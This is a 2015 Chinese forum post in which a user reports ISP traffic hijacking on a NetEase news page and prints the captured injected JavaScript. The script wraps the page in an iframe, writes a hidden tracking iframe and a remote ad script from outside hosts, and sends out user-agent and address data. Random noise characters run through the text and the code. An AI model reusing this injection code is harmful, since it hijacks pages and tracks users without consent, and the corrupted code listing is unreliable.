|
|
本帖最后由 hudba 于 2015-2-3 00:56 编辑 / [" t# H9 k- [2 M
4 N! x1 R/ h0 ?6 C上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了- @6 v' j0 U8 k) ?! b
7 e) V% _* Z2 Q2 {0 D接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}
+ ~+ f* H; Q. y1 \https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197
7 H! d% Q5 j+ G4 ?
! m( [4 s2 _/ J' J顺便查下ip138:
+ V, y2 J4 u* Z q& ?! F0 k# V$ l3 V0 E( z
这是那段js里面的代码,好象是个半成品还没写入广告数据:, @' O7 Y3 K8 h0 M, t
- function locationSearch() {" H; e' t4 B: E+ }$ k1 p1 Z
- var s = getMainJs();& R6 V( Y5 W) e$ Q. i. }+ o
- if (s == null) { L- h! E4 k+ i. c9 `3 I* m" F
- location.reload();4 s5 B2 G# ]1 D8 V
- }# f9 B8 j6 ^* y* }' Y
- return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
5 R% e2 W* S a8 m; n - }! K# s" I( l7 m, a' @! {
- 0 t6 X3 y8 G: \& g# N4 L5 V
- function getParameter(name, paraStr) {
$ k7 Y" `( {9 @ A0 Q8 ^ - var result = "";
! Z( @' @6 O+ `% o - var str = "&" + paraStr.split("?")[1];' Z& j G+ u+ Y* m8 m/ [
- var paraName = "&" + name + "=";
8 g. P5 s$ v2 F6 A8 R% [1 l, c: P* m y% V - if (str.indexOf(paraName) != -1) {
' a% {; r/ J" Z& b& K - if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {, J" p6 C& R e0 c0 m- w( t5 z
- var TmpStr = str.substring(str.indexOf(paraName), str.length);
& n" T# J! p3 n3 J } - result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(( h- z% M7 D! o& u8 o
- 1, TmpStr.length).indexOf("&")! r) c% l- A. F
- - TmpStr.indexOf(paraName) + 1);8 p4 Q) U1 H% }0 n$ \% b
- } else {: v( P j; O* {" \
- result = str.substring(str.indexOf(paraName), str.length);
& d+ O) ~( W( S" N/ l1 v" F3 \: S - }9 U7 |. y3 R' L3 d7 Y
9 n; ^( K `# K4 P6 T0 Q- result = result.substring(result.indexOf("=") + 1, result.length);
9 U7 U0 \; ^. h3 ^# f5 P7 [' p - } else {
* G5 @. l: J+ f0 m% x0 R6 L5 c - result = "No such parameter";6 T# G' _6 a8 c; L
- }
3 y6 S2 K* O; F6 ~7 G; i - return (result.replace("&", ""));
. X- A! P: V4 G8 p0 k8 Y5 |5 ? - }% Z p& E7 I/ M; z* @$ `
# q/ `8 M" I$ K- function getMainJs() {
* ^' B3 Z- o1 |, i5 z9 r - var scripts = document.getElementsByTagName("script");
6 W+ I5 }' Q% V - var s = null;. ], q+ p5 i& c8 D( l
- for (var i = 0; i < scripts.length; i++) {
7 `% L& H: J0 M# w% Y. O' Q - if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {& X2 V& U0 h' }' z9 O5 }' M
- s = scripts[i];& L( b2 ?7 g/ ^+ P
- break;4 a& M" ?4 F' j/ T2 V3 f9 i8 E
- }
) w2 @0 A; a: |8 ]. o - }' E9 S& k$ k5 H+ A
- return s;6 }/ \- _% x) V. f4 b, ] \
- }
4 U$ R. M. V, z! V0 e7 t
/ m8 d3 ]0 `7 c1 G! ~- function appendParam(oStr, aStr) {8 B- k) A) ~, R2 g E
- if (oStr.indexOf('?') > 0) {
: D( ?4 D* [# M/ x2 S7 @- a - oStr = oStr + "&" + aStr;/ j' g+ v' ]: c: X
- } else {
% y3 l F$ D6 Q+ s8 N! v! A - oStr = oStr + "?" + aStr;5 G' h% p( K. v9 ]
- }
) `7 P6 L \, h2 e - return oStr;
& n! _4 |+ d' V: P% A) s - }
4 }- ?0 q7 H" Y; ]( @8 H - 3 F# H1 Z! @% E( O
- window.onerror = function() {" D" \7 {& d7 o( B
- };5 |) W0 a# e% D# \0 u8 p: v6 Q7 ~
- ! x0 ~3 Z' @. K* f
- var g_titleTime = 0;
d% y. v0 w+ s4 k( S - function setTcTitle() {3 k* V% f6 s) |
- if (undefined == document) {
% [8 W6 q# u5 s+ a2 i - g_titleTime++;
2 `0 c1 s. d, V, p( J% m - setTimeout("setTcTitle();", 1000);+ d" m4 Y7 d t X1 j, h
- return;
7 z% f: @$ M$ P/ ~! h7 X - }% G1 H' q/ J8 J2 h8 Q8 x" B
- - F7 d9 h% E4 ~% A, D
- var doc;
8 k4 y, I# e/ `0 j - try {
7 E) H5 U, r2 e% v7 O# s - if (document.all) {
# ]9 ^: ?0 [: t3 y5 u3 i - doc = document.frames["cn"].document;4 r- x/ ?: @: E$ W( `
- } else {
$ O J: `: l E" N+ ^6 j+ d; m - doc = document.getElementById("cn").contentDocument;
% O* c. F8 A/ u7 m+ Y& i - }
/ b- g2 t" F* H+ {$ S - } catch (ex) {$ D+ z2 O, F) K% u
- }
/ H* c1 c1 R7 N) {4 D - 5 o) u1 I0 V2 e# s$ {# {
- if (g_titleTime < 5
/ U, H {9 ]- W- K# ?8 a+ b - && (undefined == doc || undefined == doc.title || "" == doc.title)) {
) E8 J) E: j( F" q4 f - g_titleTime++;
3 r3 r& A( P* J5 @7 x! y - setTimeout("setTcTitle();", 1000);" H7 |' Z5 d1 D+ {$ a
- return;
; X! h% R( P; ]( I" r - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
" p5 v$ L% h+ v; M) F - document.title = doc.title;
/ ?2 h- q1 |1 u - setTcAdvVisible();
( C/ g& C/ }$ i7 f6 m& Z/ T' [7 _ - }- W G; w' T1 X1 s; } k
- }+ E! T/ I9 Y8 x8 ~
- 0 N$ m+ g' L1 S- I. `$ Q: }1 l
- setTimeout("setTcTitle();", 1000);
: {2 L" `0 ?# t* g, E7 v. F- h7 ^
& M$ T" D" o, `4 ?# S- var g_isHaveVisible = false;
6 Q0 S3 L4 Q, }9 T* `7 i - function setTcAdvVisible() {, m) o9 D) Y1 Y# P8 E
- if (undefined != document && undefined != document.getElementById("addiv")( `/ J! j( t( L
- && !g_isHaveVisible) {
% v% b4 k7 ~" I/ C5 g4 e3 K' ] - document.getElementById("addiv").style.visibility = 'visible';
1 S. j& t2 b. i0 `4 }9 v - document.getElementById("addiv").style.display = 'block';
) V0 B C, k6 v: }/ z - g_isHaveVisible = true;) c3 I/ S5 @6 q& S3 ]
- }: F1 T5 w+ H) |/ q& U. V: k: p
- }6 b3 P+ r, S; R( y! q
- [+ o' M2 B1 p4 A
- function UrlAnalyzer() {7 I; ?2 T( k" r/ P8 i
- this.divda = "";0 j4 c8 v* K3 m0 |! I& \
- this.tctype = "";
: h& i- _: z/ K6 d7 U8 m) ? - this.radius = "";; m) }; o* l# ^
- this.rlu = "";
4 P0 C9 O0 n# e7 I! { - }5 r6 Z1 [- {4 g Z8 |5 a/ k8 ^9 m; z
4 d% s+ f" ]' H8 ?7 d- UrlAnalyzer.prototype.initParameters = function() {
+ q2 ]( H9 L: a* y; D6 @2 s5 d - var paraStr = locationSearch();6 G! ^8 N/ ?8 E6 N3 a
- this.rlu = getParameter("lruedct", paraStr);
6 c2 S( l: y7 E' V# N6 v - this.divda = getParameter("divda", paraStr);
) Q5 A) V1 u) L - this.radius = getParameter("radius", paraStr);
2 u4 f* O7 T/ ]1 w1 E, z' {$ @ - this.tctype = getParameter("tctype", paraStr);4 \, E# D( R+ j& [- ^1 J' k
- this.address = getParameter("address", paraStr);2 J: h" i1 t9 \# Z& p( b( n6 W
- this.usagent = getParameter("usagent", paraStr);3 n( v: w6 e) r6 s- \5 j; ]
- }
6 n7 Z& X" c9 @
& A, R6 y. u: i. v* q9 Q' p- UrlAnalyzer.prototype.getHtmlDoc = function() {8 a2 m' S% Y w7 ` {
- var doc;
6 c' o- P/ R2 P' { - try {
0 }8 [) I: O" ?- \0 u( r - if (document.all) {7 P1 H2 W7 K3 W$ |/ u, M
- doc = document.frames["cn"].document;% p! o& B! p: d- M N: \" o/ @6 |
- 3 Q; P4 ?/ F1 `/ }7 v" e+ p) f
- } else {
2 R$ p$ N( `# w4 a% M$ d8 a/ T - doc = document.getElementById("cn").contentDocument;* A; a" ?# z9 n
- // doc = document.getElementById("cn").contentWindow.document;
J: O% b9 X8 l - }# @0 y) z2 H( E3 {) F' Y% h( A
- } catch (ex) {
" D5 o* J/ m; K5 S) u, s* ~ - }
& ^( [# p9 h- I' I - return doc;: h0 T- |( D: j3 x% y5 e
- }
) |; Y0 ?: @# N3 `; l9 f: V
6 N! C1 Y W5 W! W' |7 v- `, o- UrlAnalyzer.prototype.setDomain = function() {4 _+ h: |- H. V
- if (undefined != document.title && "" == document.title)
4 _; j1 B' C; S3 g3 _% L - {9 A1 J0 x, A& ? V& P
- var index = document.domain.indexOf(".");4 {+ `) h/ X |& E6 |) C
- if (undefined != index && -1 != index) {+ v. |- y& z" N8 n) F% Y
- document.domain = document.domain.substring(index + 1,
" O. g6 g% ?1 b& c - document.domain.length);. Y! G7 J2 K0 T g( N
- }
8 t6 j- G& T& S7 F0 e3 s - 7 N& a/ L8 H$ ?* G; ?# L4 m
- var doc = this.getHtmlDoc();
7 |) Q8 c5 }; B* W! F6 m3 } - if (undefined != doc && undefined != doc.title && "" != doc.title) {
( ]' s! @) e. T) S' X- \+ _ - document.title = doc.title;; a8 v0 B9 @& N
- setTcAdvVisible();# J( \) f8 ^# B( z% T r
- }
4 G' h9 f. \; l+ L- Z8 a - }
! o5 W! J$ ~$ ~& } - }; C Q' H5 U+ `1 X
3 n) c: w( ]3 G0 x- ^- UrlAnalyzer.prototype.iframeCallback = function() {
) G; M" b# D$ e - var doc = this.getHtmlDoc();# g5 Q2 @8 }6 j) C6 r) q, I
- if (undefined == doc || undefined == doc.title || "" == doc.title) {
) J$ {0 w4 [0 c1 g+ e1 | - if (undefined != document.domain) {9 z7 a8 u1 o' U1 P9 Z
7 L# U( z0 r& y# F+ ]7 O- var self = this;
' ~' V7 U% O$ { - setTimeout(function(){self.setDomain.call(self, null)}, 1000);7 I! i7 {) [! p1 R9 }( R
- // var index = document.domain.indexOf(".");
$ l6 |, u8 x" T8 W3 A - // if (undefined != index && -1 != index) {
3 ]0 a7 ]0 c2 Q& _/ b1 K1 _6 m - // document.domain = document.domain.substring(index + 1,
$ d# R! R( h0 s/ B0 K - // document.domain.length);! n" c; l" a$ y2 r& P b" {6 \
- // }
1 F; X) w, A+ e2 d5 O' o3 J" X z - //$ _# |$ D9 e* x* q' i
- // var doc = this.getHtmlDoc();2 [) P8 i: J3 Q* n; w$ S/ ?
- // if (undefined != doc && undefined != doc.title && "" != x3 l# l, I! r1 r) S5 E
- // doc.title) {
4 @& e" W6 _$ c& [$ `+ a0 { - // document.title = doc.title;
6 d; q6 ]" [6 z8 R# E - // setTcAdvVisible();3 H1 f7 S( t4 d( I5 e
- // }4 H; z; h- N) G7 F1 d- M. K, M
- }/ C0 K9 E8 k* `
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {3 i/ r, m! L$ S+ c7 b
- document.title = doc.title;; q7 P3 Y1 v( H+ R% c! S/ c
- setTcAdvVisible();
]+ |/ S" E7 B - }# d7 G0 s% u. E5 J8 T$ P2 Z
- }
9 D t( g2 Y W& [, n; B ?9 M
( v/ V( L. W7 H- UrlAnalyzer.prototype.executeHtmlContext = function() {2 {3 s1 `. |5 r7 U. f! A8 H4 ]
- var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda6 H! K4 i% w- W' _! b; W- \- v
- + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;
K4 U: t7 R0 S
, H O, Z! I" U) }% x" b- var htmlStr = "<iframe src="" + staUrl/ [1 F2 S9 f5 r" b9 ^
- + "" style="display:none"></iframe>";
3 \/ C( Q9 K$ o7 b" F
7 e( Q% t5 H+ x( K. ]& L. L Z1 e- B, ?) Y- var advUrl = htmlStr g) D0 Y* e) }. p, E. B; W
- + "<script src="http://c2.sxite.com:8060/center?advId=": Z2 r$ Y9 H) i) Y0 M9 h! Q( C
- + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
l" g# T% v* G& e/ A8 F# M' c - document.write(advUrl);& R( b! z8 x% H K
3 K1 m1 V6 ^+ M8 M- var self = this;
) H+ E& v" d$ g, K, }3 q - var iframe = document.getElementById("cn");
) x/ s+ W" g! ?% A! k - if (iframe.attachEvent) {
4 t* F' |7 s5 @# e" J% B9 L - iframe.attachEvent("onload", function() {+ p2 L( v. g8 e1 l' d
- self.iframeCallback.call(self, null);, o0 S/ {/ [" ~' U* G3 Z# Y" K' s
- });% v/ Z. W5 R- q1 W# G7 L
- } else {, B% K" r5 I9 H
- iframe.onload = function() {
) F, a& i0 p7 D% Q: ? - self.iframeCallback.call(self, null);" o$ D# f2 E# z! e
- }0 v' e' z/ |8 n# B% E
- }' Y! H: e% \; ~6 H5 s2 b" D
- }
' P0 P: G4 o& D/ D
+ ~3 A: g" ^. O& `$ E5 E! c: n- UrlAnalyzer.prototype.executeMain = function() {1 }5 _! q$ [( ]) W
- var mainFrame = document.getElementById("cn");
# I$ N& T4 i& @, N- F5 m3 R0 `. @ - mainFrame.contentWindow.location.href = mainFrame.src;! J/ I$ X& y+ M9 L' ~1 s6 V
- this.initParameters();( W/ U/ m% L2 Q: T+ k% v
- this.executeHtmlContext();
' @/ H' ^4 E, t/ E - }! C9 k* r* h& s3 M- `
# r& s. X L5 Y: F2 y- var g_analyzer = new UrlAnalyzer();
& }; ]& V* {1 X - g_analyzer.executeMain();
6 [$ Q, Y% Y* ~6 T/ T
/ v+ P' ~1 w1 {) t2 {
9 h; l5 W1 Y, B, C6 c3 q |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|
发表于 2015-2-3 00:52:03
发表于 2015-2-3 04:58:09
发表于 2015-2-3 09:49:12
